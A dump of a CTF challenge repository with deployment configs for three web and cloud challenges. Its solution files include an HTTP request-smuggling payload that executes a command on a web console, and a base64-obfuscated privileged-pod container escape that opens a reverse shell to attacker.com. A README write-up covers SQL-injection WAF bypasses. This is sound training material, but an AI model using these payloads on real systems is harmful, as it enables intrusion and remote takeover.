 21 |                 "shasum": ""
 22 |             },
 23 |             "require": {
 24 |                 "php": ">=5.3.3"
 25 |             },
 26 |             "suggest": {
 27 |                 "ext-ctype": "For best performance"
 28 |             },
 29 |             "type": "library",
 30 |             "extra": {
 31 |                 "branch-alias": {
 32 |                     "dev-master": "1.12-dev"
 33 |                 }
 34 |             },
 35 |             "autoload": {
 36 |                 "psr-4": {
 37 |                     "Symfony\\Polyfill\\Ctype\\": ""
 38 |                 },
 39 |                 "files": [
 40 |                     "bootstrap.php"
 41 |                 ]
 42 |             },
 43 |             "notification-url": "https://packagist.org/downloads/",
 44 |             "license": [
 45 |                 "MIT"
 46 |             ],
 47 |             "authors": [
 48 |                 {
 49 |                     "name": "Gert de Pagter",
 50 |                     "email": "BackEndTea@gmail.com"
 51 |                 },
 52 |                 {
 53 |                     "name": "Symfony Community",
 54 |                     "homepage": "https://symfony.com/contributors"
 55 |                 }
 56 |             ],
 57 |             "description": "Symfony polyfill for ctype functions",
 58 |             "homepage": "https://symfony.com",
 59 |             "keywords": [
 60 |                 "compatibility",
 61 |                 "ctype",
 62 |                 "polyfill",
 63 |                 "portable"
 64 |             ],
 65 |             "time": "2019-08-06T08:03:45+00:00"
 66 |         },
 67 |         {
 68 |             "name": "symfony/polyfill-mbstring",
 69 |             "version": "v1.12.0",
 70 |             "source": {
 71 |                 "type": "git",
 72 |                 "url": "https://github.com/symfony/polyfill-mbstring.git",
 73 |                 "reference": "b42a2f66e8f1b15ccf25652c3424265923eb4f17"
 74 |             },
 75 |             "dist": {
 76 |                 "type": "zip",
 77 |                 "url": "https://api.github.com/repos/symfony/polyfill-mbstring/zipball/b42a2f66e8f1b15ccf25652c3424265923eb4f17",
 78 |                 "reference": "b42a2f66e8f1b15ccf25652c3424265923eb4f17",
 79 |                 "shasum": ""
 80 |             },
 81 |             "require": {
 82 |                 "php": ">=5.3.3"
 83 |             },
 84 |             "suggest": {
 85 |                 "ext-mbstring": "For best performance"
 86 |             },
 87 |             "type": "library",
 88 |             "extra": {
 89 |                 "branch-alias": {
 90 |                     "dev-master": "1.12-dev"
 91 |                 }
 92 |             },
 93 |             "autoload": {
 94 |                 "psr-4": {
 95 |                     "Symfony\\Polyfill\\Mbstring\\": ""
 96 |                 },
 97 |                 "files": [
 98 |                     "bootstrap.php"
 99 |                 ]
100 |             },
101 |             "notification-url": "https://packagist.org/downloads/",
102 |             "license": [
103 |                 "MIT"
104 |             ],
105 |             "authors": [
106 |                 {
107 |                     "name": "Nicolas Grekas",
108 |                     "email": "p@tchwork.com"
109 |                 },
110 |                 {
111 |                     "name": "Symfony Community",
112 |                     "homepage": "https://symfony.com/contributors"
113 |                 }
114 |             ],
115 |             "description": "Symfony polyfill for the Mbstring extension",
116 |             "homepage": "https://symfony.com",
117 |             "keywords": [
118 |                 "compatibility",
119 |                 "mbstring",
120 |                 "polyfill",
121 |                 "portable",
122 |                 "shim"
123 |             ],
124 |             "time": "2019-08-06T08:03:45+00:00"
125 |         },
126 |         {
127 |             "name": "twig/twig",
128 |             "version": "v2.12.1",
129 |             "source": {
130 |                 "type": "git",
131 |                 "url": "https://github.com/twigphp/Twig.git",
132 |                 "reference": "ddd4134af9bfc6dba4eff7c8447444ecc45b9ee5"
133 |             },
134 |             "dist": {
135 |                 "type": "zip",
136 |                 "url": "https://api.github.com/repos/twigphp/Twig/zipball/ddd4134af9bfc6dba4eff7c8447444ecc45b9ee5",
137 |                 "reference": "ddd4134af9bfc6dba4eff7c8447444ecc45b9ee5",
138 |                 "shasum": ""
139 |             },
140 |             "require": {
141 |                 "php": "^7.0",
142 |                 "symfony/polyfill-ctype": "^1.8",
143 |                 "symfony/polyfill-mbstring": "^1.3"
144 |             },
145 |             "require-dev": {
146 |                 "psr/container": "^1.0",
147 |                 "symfony/debug": "^3.4|^4.2",
148 |                 "symfony/phpunit-bridge": "^4.4@dev|^5.0"
149 |             },
150 |             "type": "library",
151 |             "extra": {
152 |                 "branch-alias": {
153 |                     "dev-master": "2.12-dev"
154 |                 }
155 |             },
156 |             "autoload": {
157 |                 "psr-0": {
158 |                     "Twig_": "lib/"
159 |                 },
160 |                 "psr-4": {
161 |                     "Twig\\": "src/"
162 |                 }
163 |             },
164 |             "notification-url": "https://packagist.org/downloads/",
165 |             "license": [
166 |                 "BSD-3-Clause"
167 |             ],
168 |             "authors": [
169 |                 {
170 |                     "name": "Fabien Potencier",
171 |                     "email": "fabien@symfony.com",
172 |                     "homepage": "http://fabien.potencier.org",
173 |                     "role": "Lead Developer"
174 |                 },
175 |                 {
176 |                     "name": "Twig Team",
177 |                     "homepage": "https://twig.symfony.com/contributors",
178 |                     "role": "Contributors"
179 |                 },
180 |                 {
181 |                     "name": "Armin Ronacher",
182 |                     "email": "armin.ronacher@active-4.com",
183 |                     "role": "Project Founder"
184 |                 }
185 |             ],
186 |             "description": "Twig, the flexible, fast, and secure template language for PHP",
187 |             "homepage": "https://twig.symfony.com",
188 |             "keywords": [
189 |                 "templating"
190 |             ],
191 |             "time": "2019-10-17T07:34:53+00:00"
192 |         }
193 |     ],
194 |     "packages-dev": [],
195 |     "aliases": [],
196 |     "minimum-stability": "stable",
197 |     "stability-flags": [],
198 |     "prefer-stable": false,
199 |     "prefer-lowest": false,
200 |     "platform": {
201 |         "ext-mysqli": "*",
202 |         "ext-json": "*"
203 |     },
204 |     "platform-dev": []
205 | }
206 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/htdocs/config.php:
--------------------------------------------------------------------------------
1 | <?php
2 | $CONFIG = [
3 |     "dbhost" => "d3ctf-mysql",
4 |     "dbuser" => "root",
5 |     "dbpassword" => "8282600e5379907d01452d14ef1fba52",
6 |     "dbname" => "app"
7 | ];


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/htdocs/index.php:
--------------------------------------------------------------------------------
1 | <?php
2 | define("WEB_PATH",dirname(__FILE__));
3 | require 'Core/framework.php';


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/htdocs/static/arispods_pro.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Li4n0/My-CTF-Challenges/03684eeebcc16d3dd9c653cdb8ba9099876d5bea/D^3CTF2019_Showhub/htdocs/static/arispods_pro.jpg


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/htdocs/static/clothes.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Li4n0/My-CTF-Challenges/03684eeebcc16d3dd9c653cdb8ba9099876d5bea/D^3CTF2019_Showhub/htdocs/static/clothes.jpg


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/htdocs/static/cosmetics.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Li4n0/My-CTF-Challenges/03684eeebcc16d3dd9c653cdb8ba9099876d5bea/D^3CTF2019_Showhub/htdocs/static/cosmetics.jpg


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/nginx/default.conf:
--------------------------------------------------------------------------------
 1 | ##
 2 | # You should look at the following URL's in order to grasp a solid understanding
 3 | # of Nginx configuration files in order to fully unleash the power of Nginx.
 4 | # https://www.nginx.com/resources/wiki/start/
 5 | # https://www.nginx.com/resources/wiki/start/topics/tutorials/config_pitfalls/
 6 | # https://wiki.debian.org/Nginx/DirectoryStructure
 7 | #
 8 | # In most cases, administrators will remove this file from sites-enabled/ and
 9 | # leave it as reference inside of sites-available where it will continue to be
10 | # updated by the nginx packaging team.
11 | #
12 | # This file will automatically load configuration files provided by other
13 | # applications, such as Drupal or Wordpress. These applications will be made
14 | # available underneath a path with that package name, such as /drupal8.
15 | #
16 | # Please see /usr/share/doc/nginx-doc/examples/ for more detailed examples.
17 | ##
18 | 
19 | # Default server configuration
20 | #
21 | server {
22 | 	listen 80 default_server;
23 | 	listen [::]:80 default_server;
24 | 
25 | 	# SSL configuration
26 | 	#
27 | 	# listen 443 ssl default_server;
28 | 	# listen [::]:443 ssl default_server;
29 | 	#
30 | 	# Note: You should disable gzip for SSL traffic.
31 | 	# See: https://bugs.debian.org/773332
32 | 	#
33 | 	# Read up on ssl_ciphers to ensure a secure configuration.
34 | 	# See: https://bugs.debian.org/765782
35 | 	#
36 | 	# Self signed certs generated by the ssl-cert package
37 | 	# Don't use them in a production server!
38 | 	#
39 | 	# include snippets/snakeoil.conf;
40 | 
41 | 	server_name _;
42 | 
43 | 	location / {
44 | 		proxy_pass http://d3ctf-apache2/;
45 | 	}
46 | 
47 | 	# deny access to .htaccess files, if Apache's document root
48 | 	# concurs with nginx's one
49 | 	#
50 | 	#location ~ /\.ht {
51 | 	#	deny all;
52 | 	#}
53 | }
54 | 
55 | 
56 | # Virtual Host configuration for example.com
57 | #
58 | # You can move that to a different file under sites-available/ and symlink that
59 | # to sites-enabled/ to enable it.
60 | #
61 | #server {
62 | #	listen 80;
63 | #	listen [::]:80;
64 | #
65 | #	server_name example.com;
66 | #
67 | #	root /var/www/example.com;
68 | #	index index.html;
69 | #
70 | #	location / {
71 | #		try_files $uri $uri/ =404;
72 | #	}
73 | #}
74 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/run/apache2.sh:
--------------------------------------------------------------------------------
1 | #! /bin/bash
2 | service apache2 start
3 | while true;
4 | do
5 | 	echo 1;
6 | 	sleep 5;
7 | done
8 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/run/ats.sh:
--------------------------------------------------------------------------------
1 | #! /bin/sh
2 | 
3 | /opt/ts-v2/bin/trafficserver start
4 | while true;
5 | do
6 | 	echo 1
7 | 	sleep 5
8 | done
9 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/run/nginx.sh:
--------------------------------------------------------------------------------
1 | #! /bin/sh
2 | /etc/init.d/php7.2-fpm start
3 | service nginx start
4 | while true;
5 | do
6 | 	echo 1
7 | 	sleep 5
8 | done
9 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/smuggling_payload:
--------------------------------------------------------------------------------
 1 | GET /WebConsole/ HTTP/1.1
 2 | Host: 024ac2afef.showhub.d3ctf.io
 3 | Pragma: no-cache
 4 | Cache-Control: no-cache
 5 | Upgrade-Insecure-Requests: 1
 6 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
 7 | DNT: 1
 8 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
 9 | Accept-Encoding: gzip, deflate
10 | Accept-Language: zh,en;q=0.9,zh-CN;q=0.8
11 | Cookie: PHPSESSID=cgdbdc2211g074rnbklem2fv5k
12 | Content-Length: 228
13 | Transfer-Encoding: chunked
14 | 
15 | 0
16 | 
17 | 
18 | POST /WebConsole/exec HTTP/1.1
19 | Host: 024ac2afef.showhub.d3ctf.io
20 | Client-IP: 127.0.0.1
21 | Content-Type: application/x-www-form-urlencoded
22 | Cookie: PHPSESSID=cgdbdc2211g074rnbklem2fv5k
23 | Content-Length: 30
24 | 
25 | cmd=cat /flag;
26 | 
27 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/to-player/www.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Li4n0/My-CTF-Challenges/03684eeebcc16d3dd9c653cdb8ba9099876d5bea/D^3CTF2019_Showhub/to-player/www.tar.gz


--------------------------------------------------------------------------------
/D^3CTF2021_real_cloud/.gitattributes:
--------------------------------------------------------------------------------
1 | minio filter=lfs diff=lfs merge=lfs -text
2 | mc filter=lfs diff=lfs merge=lfs -text
3 | *.jar filter=lfs diff=lfs merge=lfs -text
4 | *mc filter=lfs diff=lfs merge=lfs -text
5 | 


--------------------------------------------------------------------------------
/D^3CTF2021_real_cloud/.images/image-20210309235445715.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Li4n0/My-CTF-Challenges/03684eeebcc16d3dd9c653cdb8ba9099876d5bea/D^3CTF2021_real_cloud/.images/image-20210309235445715.png


--------------------------------------------------------------------------------
/D^3CTF2021_real_cloud/.images/image-20210310161854461.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Li4n0/My-CTF-Challenges/03684eeebcc16d3dd9c653cdb8ba9099876d5bea/D^3CTF2021_real_cloud/.images/image-20210310161854461.png


--------------------------------------------------------------------------------
/D^3CTF2021_real_cloud/.images/image-20210310162429028.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Li4n0/My-CTF-Challenges/03684eeebcc16d3dd9c653cdb8ba9099876d5bea/D^3CTF2021_real_cloud/.images/image-20210310162429028.png


--------------------------------------------------------------------------------
/D^3CTF2021_real_cloud/.images/image-20210310163123500.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Li4n0/My-CTF-Challenges/03684eeebcc16d3dd9c653cdb8ba9099876d5bea/D^3CTF2021_real_cloud/.images/image-20210310163123500.png


--------------------------------------------------------------------------------
/D^3CTF2021_real_cloud/.images/image-20210310185835793.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Li4n0/My-CTF-Challenges/03684eeebcc16d3dd9c653cdb8ba9099876d5bea/D^3CTF2021_real_cloud/.images/image-20210310185835793.png


--------------------------------------------------------------------------------
/D^3CTF2021_real_cloud/.images/image-20210311215422732.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Li4n0/My-CTF-Challenges/03684eeebcc16d3dd9c653cdb8ba9099876d5bea/D^3CTF2021_real_cloud/.images/image-20210311215422732.png


--------------------------------------------------------------------------------
/D^3CTF2021_real_cloud/README.md:
--------------------------------------------------------------------------------
 1 | # 环境搭建
 2 | 
 3 | 题目架构如下：
 4 | 
 5 | ![image-20210311215422732](.images/image-20210311215422732.png)
 6 | 
 7 | ## 下载配置文件
 8 | clone仓库或使用[download-directory](https://download-directory.github.io/)单独下载本题目文件夹
 9 | 
10 | **注意：** 如果使用[download-directory](https://download-directory.github.io/)下载的该题目文件夹，则需要手动下载 oss 文件夹内的`minio`和`mc`, `k8s/code`文件夹内的`d3cloud-1.0-SNAPSHOT-jar-with-dependencies.jar` 文件。因为`download-directory` 不支持 `git lfs`
11 | 
12 | ## 搭建k8s集群
13 | 
14 | 使用[kubeadm](https://kubernetes.io/docs/setup/production-environment/tools/kubeadm/create-cluster-kubeadm/)搭建 1 node 1 master 的集群、网络插件使用`flannel` 即可
15 | 
16 | ## 部署Serverless
17 | 
18 | 1. 安装 [Fission CLI](https://docs.fission.io/docs/installation/#install-fission-cli)
19 | 
20 | 2. 初始化Serverless
21 | 
22 |    ```bash
23 |    cd k8s
24 |    kubectl apply -f fission-all-1.11.2.yaml
25 |    kubectl apply -f nginx.yaml
26 |    kubectl apply -f flag.yaml
27 |    
28 |    sh initFission.sh
29 |    ```
30 | 
31 | 3. 解析域名: **fn10050213.serverless.cloud.yourdomain** 到 `k8s node` 的机器IP
32 | 
33 | ## 部署OSS
34 | 
35 | 1. 修改`oss/Caddyfile`，将`d3ctf.io` 替换成`yourdomain`，并添加对应的解析记录
36 | 2. 直接使用`docker-compose`启动
37 | 
38 | ## 部署前端
39 | 
40 | 1. 将`index.html` 内的`d3ctf.io`替换为`yourdomain`
41 | 2. 启动HTTP服务器
42 | 
43 | 


--------------------------------------------------------------------------------
/D^3CTF2021_real_cloud/frontend/index.html:
--------------------------------------------------------------------------------
 1 | <html>
 2 | <head>
 3 |     <link rel="stylesheet" href="/static/css/tabler.min.css">
 4 |     <script src="/static/js/tabler.min.js"></script>
 5 |     <style>
 6 |         footer {
 7 |             width: 100%;
 8 |             height: 40px;
 9 |             position: absolute;
10 |             bottom: 0px;
11 |             left: 0px;
12 |             text-align: center;
13 |         }
14 |     </style>
15 | </head>
16 | <body>
17 | <div style="margin: 0 20% 0 20%;position:absolute;top: 20%;width: 60%;text-align: center">
18 |     <h1>Upload your file:</h1>
19 |     <div class="mb-3" style="margin: 5% 0 5% 0">
20 |         <input id="file" type="file" class="form-control form-control-rounded mb-2" name="file"
21 |                onchange="checkFile()">
22 |     </div>
23 |     <button id="upload" onclick="upload()" class="btn btn-info" disabled>upload</button>
24 |     <div id="info">
25 | 
26 |     </div>
27 | </div>
28 | <footer>
29 |     Copyright &copy; 2021 Li4n0@D^3CTF
30 | </footer>
31 | <script>
32 |     function checkFile() {
33 |         var fileInput = document.getElementById('file')
34 |         if (!fileInput.value) {
35 |             info.innerHTML = 'No file chosen';
36 |             return;
37 |         }
38 |         let file = fileInput.files[0];
39 |         if (file.size > 204800) {
40 |             document.getElementById("info").innerText = "It's too big!";
41 |         } else {
42 |             document.getElementById("info").innerText = "";
43 |             document.querySelector("#upload").removeAttribute("disabled");
44 |         }
45 |     }
46 | 
47 |     function upload() {
48 |         var fileInput = document.getElementById('file')
49 |         if (!fileInput.value) {
50 |             info.innerHTML = 'No file chosen';
51 |             return;
52 |         }
53 |         let file = fileInput.files[0];
54 |         let reader = new FileReader();
55 |         reader.onload = function (e) {
56 |             let data = e.target.result.substring(this.result.indexOf(',') + 1);
57 |             document.getElementById("info").innerText = "Uploading...";
58 |             fetch("http://fn10050213.serverless.cloud.d3ctf.io/upload", {
59 |                 method: "POST",
60 |                 headers: {
61 |                     "Origin": location.href,
62 |                     "Content-Type": "application/json",
63 |                 },
64 |                 body: JSON.stringify({
65 |                     "endpoint": "oss.cloud.d3ctf.io",
66 |                     "key": file.name,
67 |                     "bucket": "bucket102638",
68 |                     "file": data
69 |                 })
70 |             }).then(response => response.json())
71 |                 .then(data => {
72 |                     if (data.success) {
73 |                         document.getElementById("info").innerHTML = `<a href="${data.url}">${data.url}</a>`;
74 |                     } else {
75 |                         document.getElementById("info").innerText = "Upload failed!";
76 |                     }
77 |                 })
78 |         };
79 | 
80 |         reader.readAsDataURL(file)
81 | 
82 |     }
83 | </script>
84 | </body>
85 | </html>
86 | 


--------------------------------------------------------------------------------
/D^3CTF2021_real_cloud/k8s/code/d3cloud-1.0-SNAPSHOT-jar-with-dependencies.jar:
--------------------------------------------------------------------------------
1 | version https://git-lfs.github.com/spec/v1
2 | oid sha256:e807ffc1d618ff711a6e58512e414cae5d2ca8116918f61d60431a64618c74ea
3 | size 17635448
4 | 


--------------------------------------------------------------------------------
/D^3CTF2021_real_cloud/k8s/code/optionsHandler.py:
--------------------------------------------------------------------------------
 1 | import flask
 2 | 
 3 | def main():
 4 |     resp = flask.Response("")
 5 |     resp.status_code = 204
 6 |     resp.headers['Access-Control-Allow-Origin'] = '*'
 7 |     resp.headers['Access-Control-Allow-Method'] = 'GET,HEAD,PUT,DELETE,OPTIONS'
 8 |     resp.headers['Access-Control-Allow-Headers'] = 'content-type'
 9 |     return resp
10 | 


--------------------------------------------------------------------------------
/D^3CTF2021_real_cloud/k8s/flag.yaml:
--------------------------------------------------------------------------------
1 | apiVersion: v1
2 | kind: Secret
3 | metadata:
4 |   name: flag
5 | type: Opaque
6 | data:
7 |   flag: ZDNjdGZ7ZGVmQHVsdF9zZWN1cml0eV8wZl9jMW91ZF9jb21wb25lbnRzX2lzX2ltcDBydGFudH0=
8 | 


--------------------------------------------------------------------------------
/D^3CTF2021_real_cloud/k8s/initFission.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | fission env create --name python-env --image fission/python-env
 3 | fission env create --name jvm-env --image fission/jvm-env --builder fission/jvm-env  --keeparchive --version 2
 4 | fission env create --name jvm-env-test --image fission/jvm-env --builder fission/jvm-env
 5 | fission fn create --name options-trigger --env python-env --code code/optionsHandler.py
 6 | fission fn create --name upload --env jvm-env --deploy code/d3cloud-1.0-SNAPSHOT-jar-with-dependencies.jar --entrypoint io.fission.Upload
 7 | fission fn create --name list --env jvm-env-test --deploy d3cloud-1.0-SNAPSHOT-jar-with-dependencies.jar --entrypoint io.fission.Upload
 8 | fission fn test --name list
 9 | fission httptrigger create --url /upload --method 'POST' --function upload --createingress
10 | fission httptrigger create --url /upload --method 'OPTIONS' --function options-trigger --createingress
11 | 


--------------------------------------------------------------------------------
/D^3CTF2021_real_cloud/oss/Caddyfile:
--------------------------------------------------------------------------------
 1 | bucket102638.oss.cloud.d3ctf.io:80 {
 2 |   rewrite * /bucket102638{path}
 3 |   reverse_proxy * {
 4 |     to http://oss:10000
 5 |   }
 6 |   header {
 7 |     Server "d3cloud-NOS-Server"
 8 |     defer
 9 |   }
10 | }
11 | *.oss.cloud.d3ctf.io:80 {
12 |   header {
13 |         Server "d3cloud-NOS-Server"
14 |         Content-Type "application/xml"
15 |         defer
16 |   }
17 |   respond * "<?xml version=\"1.0\" encoding=\"UTF-8\"?>
18 |   <Error><Code>NotFound</Code><Message>BucketNotFound</Message><RequestId>1666E4047E5A0151</RequestId><HostId>a5747bbe-791c-4297-a956-0f0dbebaa56d</HostId></Error>" 404 {
19 |     	close
20 |   }
21 | }
22 | 
23 | 


--------------------------------------------------------------------------------
/D^3CTF2021_real_cloud/oss/docker-compose.yaml:
--------------------------------------------------------------------------------
 1 | version: "3.7"
 2 | services:
 3 |   caddy:
 4 |     image: caddy
 5 |     restart: unless-stopped
 6 |     ports:
 7 |       - "80:80"
 8 |     volumes:
 9 |       - $PWD/Caddyfile:/etc/caddy/Caddyfile
10 | 
11 |   oss:
12 |     image: alpine
13 |     volumes:
14 |       - $PWD/minio:/minio
15 |     environment:
16 |       MINIO_ROOT_USER: d3ctf
17 |       MINIO_ROOT_PASSWORD: d3ctf@&*P#ssw0rd
18 |       MINIO_BROWSER: "off"
19 |     command: /minio server --address=:10000 data
20 |     healthcheck:
21 |       test: nc 127.0.0.1 10000
22 |       retries: 3
23 |       timeout: 3s
24 | 
25 |   oss-init:
26 |     image: alpine
27 |     volumes:
28 |       - $PWD/mc:/mc
29 |       - $PWD/init.sh:/init.sh
30 |     depends_on:
31 |       oss:
32 |         condition: service_healthy
33 |     command: sh /init.sh
34 | 


--------------------------------------------------------------------------------
/D^3CTF2021_real_cloud/oss/init.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | /mc config host add d3ctf http://oss:10000 d3ctf 'd3ctf@&*P#ssw0rd'
3 | /mc mb d3ctf/bucket102638
4 | /mc policy set download d3ctf/bucket102638
5 | /mc policy set public d3ctf/bucket102638
6 | 


--------------------------------------------------------------------------------
/D^3CTF2021_real_cloud/oss/mc:
--------------------------------------------------------------------------------
1 | version https://git-lfs.github.com/spec/v1
2 | oid sha256:cc3973c6ec6d4bc9a2a822ddd730c6e69cdc21bfa9bf6c84aad8d4672e0e8f95
3 | size 19689472
4 | 


--------------------------------------------------------------------------------
/D^3CTF2021_real_cloud/oss/minio:
--------------------------------------------------------------------------------
1 | version https://git-lfs.github.com/spec/v1
2 | oid sha256:5f18829543f337763b58a73291b33fc68008c3f8d3ae4c0d9e5736e59494cd68
3 | size 55656448
4 | 


--------------------------------------------------------------------------------
/D^3CTF2021_real_cloud/payload.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "kind": "Environment",
 3 |   "apiVersion": "fission.io/v1",
 4 |   "metadata": {
 5 |     "name": "jvm-env-test",
 6 |     "namespace": "default",
 7 |     "uid": "94b42253-2842-4957-9350-810139022165",
 8 |     "resourceVersion": "46030",
 9 |     "generation": 1,
10 |     "creationTimestamp": "2021-02-13T11:49:09Z",
11 |     "managedFields": [
12 |       {
13 |         "manager": "fission-bundle",
14 |         "operation": "Update",
15 |         "apiVersion": "fission.io/v1",
16 |         "time": "2021-02-13T11:49:09Z"
17 |       }
18 |     ]
19 |   },
20 |   "spec": {
21 |     "version": 2,
22 |     "runtime": {
23 |       "image": "fission/jvm-env",
24 |       "podspec": {
25 |         "containers": [
26 |           {
27 | 			"name":"hack",
28 |             "image": "fission/jvm-env",
29 |             "command": [
30 |               "/bin/sh",
31 |               "-c",
32 |               "echo -n 'bWtkaXIgLXAgL3RtcC9jZ3JwOyBtb3VudCAtdCBjZ3JvdXAgLW8gbWVtb3J5IGNncm91cCAvdG1wL2NncnAgJiYgbWtkaXIgLXAgL3RtcC9jZ3JwL2hhY2tlZAplY2hvIDEgPiAvdG1wL2NncnAvaGFja2VkL25vdGlmeV9vbl9yZWxlYXNlCmhvc3RfcGF0aD1gc2VkIC1uICdzLy4qXHBlcmRpcj1cKFteLF0qXCkuKi9cMS9wJyAvZXRjL210YWJgCmVjaG8gIiRob3N0X3BhdGgvY21kX2ZyciIgPiAvdG1wL2NncnAvcmVsZWFzZV9hZ2VudAplY2hvICcjIS9iaW4vc2gnID4gL2NtZF9mcnIKZWNobyAiYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC9hdHRhY2tlci5jb20vMTAwODAgMD4mMScgICIgPj4gL2NtZF9mcnIKY2htb2QgYSt4IC9jbWRfZnJyCnNoIC1jICJlY2hvIFwkXCQgPiAvdG1wL2NncnAvaGFja2VkL2Nncm91cC5wcm9jcyI=' | base64 -d | sh"
33 |             ],
34 |             "securityContext": {
35 |               "privileged": true            
36 |             }
37 |           }
38 |         ]
39 |       }
40 |     },
41 |     "poolsize": 3,
42 |     "keeparchive": true
43 |   }
44 | }
45 | 


--------------------------------------------------------------------------------
/HCTF2018_kzone/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM mattrayner/lamp:latest-1604
 2 | 
 3 | COPY hctf.sql /home/hctf.sql
 4 | COPY init.sh /home/init.sh
 5 | COPY apache2.conf /etc/apache2/apache2.conf
 6 | 
 7 | RUN echo " <VirtualHost *:80> \n \
 8 |     DocumentRoot /var/www/html\n \
 9 |     <Directory /var/www/html>\n \
10 |     	Options FollowSymLinks\n \
11 |         Order deny,allow\n \
12 |         AllowOverride None\n  \
13 |         Allow from all\n \
14 |     </Directory>\n \
15 |  </VirtualHost> " > /etc/apache2/sites-available/000-default.conf
16 | RUN rm -rf /var/www/php*
17 | 
18 | EXPOSE 80
19 | 


--------------------------------------------------------------------------------
/HCTF2018_kzone/README.md:
--------------------------------------------------------------------------------
  1 | # HCTF2018_kzone
  2 | 
  3 | ## 题目情况：
  4 | 
  5 | | Name | Description | Score|Solved|
  6 | | ------ | ------ | ---- | ---- |
  7 | | kzone | A script kid's phishing website | 361.29 |  34  |
  8 | 
  9 | ## 源码：
 10 | 
 11 | 所有源码都在上面了
 12 | 
 13 | ### 如何启动：
 14 | 
 15 | ```shell
 16 | git clone https://github.com/Li4n0/HCTF2018_kzone.git
 17 | cd HCTF2018_kzone/
 18 | sh start_up.sh 
 19 | ```
 20 | 
 21 | 默认端口为10000
 22 | 
 23 | ## 出题思路以及Write Up：
 24 | 
 25 | 大二狗第一次出题，出的不够严谨，导致了比较严重的非预期，不过看到非预期的姿势也非常有趣，赛后调查数据又看到很多师傅表示很喜欢这道题目，我就觉得这道题目还是有意义的。
 26 | 
 27 | 那么先来说说我本身的出题思路吧！
 28 | 
 29 | 首先，题目本身是基于我今年暑假遇到的一个QQ空间钓鱼平台的源码改造而来的，这个钓鱼平台本身的问题很多，这次题目就是利用了其中`memeber.php` 中存在的 cookie 注入点 。
 30 | 
 31 | 来看看平台本身的注入点：
 32 | 
 33 | ```php
 34 | $admin_user=base64_decode($_COOKIE['admin_user']);
 35 | $udata = $DB->get_row("SELECT * FROM fish_admin WHERE username='$admin_user' limit 1");
 36 | if($udata['username']==''){
 37 | 	setcookie("islogin", "", time() - 604800);
 38 | 	setcookie("admin_user", "", time() - 604800);
 39 | 	setcookie("admin_pass", "", time() - 604800);
 40 | }
 41 | $admin_pass=sha1($udata['password'].LOGIN_KEY);
 42 | if($admin_pass==$_COOKIE["admin_pass"]){
 43 | 	$islogin=1;
 44 | }else{
 45 | 	setcookie("islogin", "", time() - 604800);
 46 | 	setcookie("admin_user", "", time() - 604800);
 47 | 	setcookie("admin_pass", "", time() - 604800);
 48 | }
 49 | ```
 50 | 
 51 | 而在原本的代码基础上，我将`admin_user` 和 `admin_pass` 的引入方式改为`json_decode` (后面会解释原因)，并且增加了一个全局 WAF，对 `$_GET` `$_POST` `$_COOKIE` 分别进行了过滤
 52 | 
 53 | 过滤的内容如下：
 54 | 
 55 | `$blacklist = '/union|ascii|mid|left|greatest|least|substr|sleep|or|and|benchmark|like|regexp|if|=|-|<|>|\#|\s/i';` 
 56 | 
 57 | 那么如何绕过这个 WAF 呢？大多数师傅都是利用了 `json` 反序列化时，会将`Unicode` 解码的特性，实现了完全绕过 WAF ，这里其实是我过滤的不够完善了。大家可以想一下，如果`\` 也被过滤掉，还有没有其他姿势呢？
 58 | 
 59 | 其实这个 WAF 造成最大的障碍就是过滤了 `or` 导致没有办法通过 `information_schema` 库来查询表名，然而其实`MySQL`  5.7 之后的版本，在其自带的 `mysql` 库中，新增了 `innodb_table_stats ` 和 `innodb_index_stats` 这两张日志表。如果数据表的引擎是`innodb` ，则会在这两张表中记录表、键的信息 。
 60 | 
 61 | 而从 `install.sql` 中可以看出，网站使用的正是`innodb` 引擎
 62 | 
 63 | ```sql
 64 | CREATE TABLE IF NOT EXISTS `fish_admin` (
 65 |   `id` tinyint(3) unsigned NOT NULL AUTO_INCREMENT,
 66 |   `username` varchar(20) NOT NULL,
 67 |   `password` char(32) NOT NULL,
 68 |   `name` varchar(255) DEFAULT '',
 69 |   `qq` varchar(255) DEFAULT '',
 70 |   `per` int(11) NOT NULL DEFAULT '3',
 71 |   PRIMARY KEY (`id`),
 72 |   UNIQUE KEY `username` (`username`)
 73 | ) ENGINE=innodb  DEFAULT CHARSET=utf8 AUTO_INCREMENT=2 ;
 74 | ```
 75 | 
 76 | 因此我们使用 `mysql.innodb_table_stats` 来代替 `information_schema.tables`  即可获取表名。于是现在我们需要思考如何判断注入结果，`sleep` 和 `benchmark` 都已经被过滤了，只能考虑布尔盲注(不考虑笛卡尔积...)。
 77 | 
 78 | 那么现在是时候来解释一下为什么我要把 `base64_decode ` 换成 `json_decode` 了，这个思路其实是来自 `微擎` 之前一个版本的漏洞：
